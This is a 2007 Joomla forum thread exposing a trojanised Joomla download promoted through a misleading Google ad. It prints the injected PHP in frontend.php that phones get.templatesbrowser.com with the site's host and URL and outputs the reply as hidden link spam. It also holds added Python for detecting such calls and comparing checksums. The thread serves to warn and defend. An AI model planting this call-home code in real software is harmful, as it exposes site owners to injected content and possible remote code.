Joomla!
http://forum.joomla.org/

Phishing site CONFIRMED
http://forum.joomla.org/viewtopic.php?f=267&t=185573

Author:  AlecWeb [ Thu Jun 28, 2007 6:27 pm ]
Post subject:  Phishing site CONFIRMED

Hi guys,

I found this site today: http://www.templatesbrowser.com/downloa ... UAodhhZbYQ
It was a commercial link in Google when I typed 'joomla' as keyword.

I wasn't able to check it, but I was thinking this could be a potential malicious file with a backdoor.

Just my 2 cents :)

Regards,
Alec

Author:  pe7er [ Thu Jun 28, 2007 7:42 pm ]
Post subject:  Phishing site CONFIRMED

AlecWeb wrote:
I wasn't able to check it, but I was thinking this could be a potential malicious file with a backdoor.

Yes, it's Joomla 1.0.12 indeed, but one file has been altered: /includes/frontend.php

The following (spyware?) code has been added to the file.
It's included in the function mosMainBody():
$url = "http://get.templatesbrowser.com/j.php?" .
        "host=" . urlencode($_SERVER['HTTP_HOST']) . "&" . "url=" . urlencode($_SERVER['REQUEST_URI']);
$check = @fsockopen("get.templatesbrowser.com", 80, $errno, $errstr, 3);
if($check)
{
  @readfile($url);
  fclose($check);
}


When mosMainBody is run, the routine creates a URL variable with your server's hostname + your website's URL,
and it tests whether it is able to connect to the templatesbrowser site.
If it is able to create a connection, then that URL (with your hostname + your website's URL) will be retrieved,
and templatesbrowser can store statistics about your site.
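
Added example (not part of pe7er's post and not Joomla code): a small Python heuristic that flags the pattern shown above, a PHP call that opens a socket to, or reads from, a hard-coded remote host. The function name `find_remote_calls`, the `allowed_hosts` parameter and the wrapper around the posted snippet in `SAMPLE` are assumptions made for illustration.

```python
import re

URL_RE = re.compile(r"""["']https?://([A-Za-z0-9.-]+)""")
ASSIGN_RE = re.compile(r"(\$\w+)\s*=([^;]*);")
CALL_RE = re.compile(
    r"(@?)\b(fsockopen|readfile|file_get_contents|fopen|curl_init)\s*\(\s*([^,)]+)")

# Constructed sample: the snippet from the post inside a stand-in mosMainBody().
SAMPLE = '''<?php
function mosMainBody() {
  readfile("templates/header.html");
  $url = "http://get.templatesbrowser.com/j.php?" .
        "host=" . urlencode($_SERVER['HTTP_HOST']) . "&" . "url=" . urlencode($_SERVER['REQUEST_URI']);
  $check = @fsockopen("get.templatesbrowser.com", 80, $errno, $errstr, 3);
  if($check)
  {
    @readfile($url);
    fclose($check);
  }
}
'''


def find_remote_calls(php_source, allowed_hosts=()):
    """Return (line, function, host, error_suppressed) for calls that reach a remote host."""
    # Variables whose assigned value contains an http(s) URL literal, e.g. $url = "http://host/..." . ...
    remote_vars = {}
    for var, rhs in ASSIGN_RE.findall(php_source):
        found = URL_RE.search(rhs)
        if found:
            remote_vars[var] = found.group(1).lower()
    findings = []
    for call in CALL_RE.finditer(php_source):
        suppressed, func, arg = call.group(1) == "@", call.group(2), call.group(3).strip()
        literal_url = URL_RE.match(arg)
        if literal_url:
            host = literal_url.group(1).lower()
        elif arg in remote_vars:
            host = remote_vars[arg]
        elif func == "fsockopen" and arg.startswith(('"', "'")):
            host = arg.strip("\"'").lower()  # fsockopen() takes a bare hostname
        else:
            continue  # local path or an argument this heuristic cannot resolve
        if host not in allowed_hosts:
            line = php_source.count("\n", 0, call.start()) + 1
            findings.append((line, func, host, suppressed))
    return findings
```

The `@` flag is reported because error suppression keeps a failed connection from ever showing up in the site's output or logs.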

Author:  pe7er [ Thu Jun 28, 2007 7:51 pm ]
Post subject:  Re: Phishing site?

I was looking for some more info regarding that website,
and I found an interesting article: http://www.onnoot.com/e/532/Templatesbr ... _WordPress

The article describes the same routine as I found in their Joomla's /includes/frontend.php
It includes hidden commercial links ("link spam") in your site, without your knowing!

btw: an interesting quote from the onnoot.com website:
Quote:
Templatesbrowser.com apparently does this to increase the pagerank of certain websites. We're not sure if Google falls for this little link spam trick. But if Google does find out that your page contains link spam, you risk being punished. That could mean that your website is removed from Google's search result pages.

Author:  rliskey [ Thu Jun 28, 2007 8:03 pm ]
Post subject:  Re: Phishing site?

A great example of why it is important to download applications ONLY from trusted sites!

I've linked to this topic as an example in the Administrators Security Checklist.
http://help.joomla.org/component/option ... temid,268/

EDIT: Topic title changed for increased clarity

Author:  aruba [ Thu Jun 28, 2007 8:55 pm ]
Post subject:  Re: Phishing site?

rliskey wrote:
A great example of why it is important to download applications ONLY from trusted sites!

I've linked to this topic as an example in the Administrators Security Checklist.
http://help.joomla.org/component/option ... temid,268/

EDIT: Topic title changed for increased clarity


I've been beating the drum on this since last year :(

It can only get worse IMHO.

As Joomla gets more secure, you will see more and more ingenious ways to subvert that security.

Nowhere is that more true than the templates and extensions directory.

I have always maintained that ALL GPL code submitted to the JED MUST be archived ON Jforge.
If there is to be a code update, it is communicated to JForge and the version number is incremented.

Even if Joomla does not supply the download and defers to the developer (who may want a link to their site and registration before you can download - a behavior I deplore), an archived copy can protect users from having spy code introduced to their machine.
After download, they can compare a generated checksum of the code from site 'X' with the Joomla archived version.


There is an incredible risk of hijack and coercive code being introduced to the community.

Note that the above code connects to the home site and loads HTML DATA. IT COULD EASILY HAVE LOADED CODE INSTEAD TO BE RUN IN THE CONTEXT OF YOUR SITE! (by returning a string and executing an EVAL against it)


This is very serious news... I hope we can take time off the "GREAT GPL DEBATE DEBACLE" to handle it properly :(
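
Added example (not part of aruba's post and not Joomla or JForge tooling): the checksum comparison proposed above, carried out per file over two unpacked packages so the result names which file differs, as /includes/frontend.php did in this thread. The function names and the two sample trees are constructed for illustration.

```python
import hashlib
import tempfile
from pathlib import Path


def tree_manifest(root):
    """Map each file's path (relative to root, POSIX style) to its SHA-256 hex digest."""
    root = Path(root)
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            manifest[path.relative_to(root).as_posix()] = digest
    return manifest


def compare_trees(reference, suspect):
    """Report files that are altered, added or missing in suspect relative to reference."""
    ref, sus = tree_manifest(reference), tree_manifest(suspect)
    return {
        "altered": sorted(p for p in ref.keys() & sus.keys() if ref[p] != sus[p]),
        "added": sorted(sus.keys() - ref.keys()),
        "missing": sorted(ref.keys() - sus.keys()),
    }


def build_demo_trees(base):
    """Constructed sample data: two tiny trees that differ in one file plus one extra file."""
    files = {
        "index.php": "<?php require 'includes/frontend.php';\n",
        "includes/frontend.php": "<?php function mosMainBody() { /* original body */ }\n",
    }
    for name in ("reference", "suspect"):
        for rel, text in files.items():
            target = Path(base, name, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(text)
    tampered = Path(base, "suspect", "includes", "frontend.php")
    tampered.write_text(tampered.read_text() + "// constructed stand-in for added code\n")
    Path(base, "suspect", "extra.php").write_text("<?php // constructed\n")
    return Path(base, "reference"), Path(base, "suspect")


def demo():
    with tempfile.TemporaryDirectory() as base:
        return compare_trees(*build_demo_trees(base))


if __name__ == "__main__":
    print(demo())
```

The comparison is only as trustworthy as the reference tree, so the reference copy has to come from the archive the project itself controls.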

Author:  AlecWeb [ Thu Jun 28, 2007 11:24 pm ]
Post subject:  Re: Phishing site CONFIRMED

Actually the real reason why this scared me was the way it's shown in Google (using keywords 'download joomla'):

It is a commercial/sponsored link and it's written "joomla.org" underneath it, instead of "templatesbrowser.com".
You can see on this screenshot that when I go over the link with the mouse, the statusbar shows templatesbrowser.com instead of Joomla.
So any user that doesn't pay attention will download this piece of malware.

Maybe the Joomla team could inform Google about this abuse, before too many users follow this link?

Anyway, thanks for the great piece of software!
(btw: I always use the real joomla.org to download Joomla! :)

Regards,
Alec

The screenshots:
http://alecweb.ulyssis.org/sponsered-link-2.png
http://alecweb.ulyssis.org/sponsered-link-joomla.png

Author:  pe7er [ Fri Jun 29, 2007 2:34 pm ]
Post subject:  Re: Phishing site CONFIRMED

AlecWeb wrote:
Actually the real reason why this scared me was the way it's shown in Google (using keywords 'download joomla'):

It is a commercial/sponsored link and it's written "joomla.org" underneath it, instead of "templatesbrowser.com".
You can see on this screenshot that when I go over the link with the mouse, the statusbar shows templatesbrowser.com instead of Joomla.
So any user that doesn't pay attention will download this piece of malware.

Maybe the Joomla team could inform Google about this abuse, before too many users follow this link?


The latest news:
  • The sponsored link @ Google is no longer there...
  • And the download link is 404.

Thanks to all who helped solve this issue
(& special thanks to Wordpress user Onnoot for his efforts)
:)

All times are UTC